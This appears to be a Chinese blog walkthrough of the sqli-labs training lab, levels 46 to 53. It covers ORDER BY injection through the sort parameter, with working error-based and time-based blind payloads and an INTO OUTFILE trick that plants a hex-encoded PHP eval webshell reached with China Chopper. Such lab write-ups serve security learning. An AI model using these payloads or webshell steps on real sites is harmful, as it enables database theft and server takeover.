zoukankan      html  css  js  c++  java

  • sqli-labs Less46-Less53

    Less-46

    补充知识

    select * from users order by 1 desc ;使用降序(倒序)排列

    select * from users order by 1 asc ;使用升序(正序)排列

    select right(database(),1);从右至左输出第一个字母

    select lesft(database(),1);从左至右输出第一个字母

    lines terminated by *** 每行输出以***结尾

    打开第46关,发现一句话  Please input parameter as SORT with numeric value    

    之前我们都是用id,这一关提示我们用SORT

     我们观察源码发现这一关要使用sort代替id

     我们输入?sort=1

     改变sort后面的数值,1代表把第一列按从小到大进行排列,3 就代表把第3列按从小到大进行排列:

    http://127.0.0.1/sqli-labs-master/Less-46/?sort=3

     在开头说到了两句升序降序的代码,我们这里试着使用它的后缀

    http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 desc  第一列降序排列

     http://127.0.0.1/sqli-labs-master/Less-46/?sort=3 asc   第三列升序排列

     接下来我们可以注入取数据了

    方法一、报错注入

    http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and updatexml(1,concat(0x7e,database()),1)

     http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),1),1)

     具体语句可以参考第17关的报错注入语句,此处省略

    方法二、时间盲注

    http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and if(length(database())=8,1,sleep(5))

     http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and if(left((select schema_name from information_schema.schemata limit 0,1),1)>'a',1,sleep(5)) --+

     剩下的语句可以参考第14关的语句

    方法三、一句话木马

    使用outfile的方法在WWW文件夹下创建文件夹less46  路径注意使用双斜杠

    http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 into outfile "C:\phpStudy\WWW\less.php" --+

     发现文件虽然有了,但是没有一句话木马,无法与中国菜刀连接

     开头我们说到了lines terminated by 0x*  每行输出以0x*结尾   ,将最后添加的这句话转换成16进制

    php的一句话是:

        <?php @eval($_POST['pass']);?>

    http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 into outfile "C:\phpStudy\WWW\less46.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b276c786b275d293b3f3e --+

     

     打开中国菜刀,右键添加

    连接成功,可以访问

     

     Less-47

    这一关使用单引号包裹,其他均与第46关相同

    Less-48

    这一关与第46关几乎一样,区别是这一关没有回显信息,所以不能使用报错注入,可以使用盲注或者一句话木马

    Less-49

    这一关使用单引号包裹,无回显信息,不能使用报错注入,可以使用盲注或者一句话木马,其他的参考第46关

    Less-50

    这一关我们首先查看有没有包裹

     查看源码,发现使用了mysqli_multi_query() 函数,我们这里可以使用报错注入,盲注,这里我们也可以使用堆叠注入创建新的表,堆叠注入写入一句话木马,这些都可以参考之前的关卡。

     Less-51

    使用单引号包裹,其余和第50关相同

    五种方法

    1、报错注入

    2、时间或布尔盲注

    3、写入一句话木马

    4、堆叠注入创建新的user表

    5、堆叠注入写入一句话木马

    Less-52

    这一关没有包裹,没有回显,其余的与第50关基本相同,但我们不能使用报错注入

    可以使用如下方法

    1、盲注

    2、一句话木马

    3、堆叠注入创建新的user表

    4、堆叠注入写入一句话木马

    Less-53

    这一关使用单引号进行包裹,无回显信息,不能使用报错注入,其余均和第50关相同

    可以使用如下方法

    1、盲注

    2、一句话木马

    3、堆叠注入创建新的user表

    4、堆叠注入写入一句话木马
  • 相关阅读:
    idea打开项目,没有项目文件,文件报红
    使用lombok自动生成链式调用
    gson常用的方式
    LOADING Redis is loading the dataset in memory Redis javaAPI实例
    redis.clients.jedis.exceptions.JedisDataException :READONLY You can't write
    Redis安装步骤
    springboot+jpa+mysql+redis+swagger整合步骤
    springboot+jpa+mysql+swagger2.0整合
    Daily Scrum 10.23
    Daily Scrum 10.22
  • 原文地址:https://www.cnblogs.com/heiwa-0924/p/12391731.html
Copyright © 2011-2022 走看看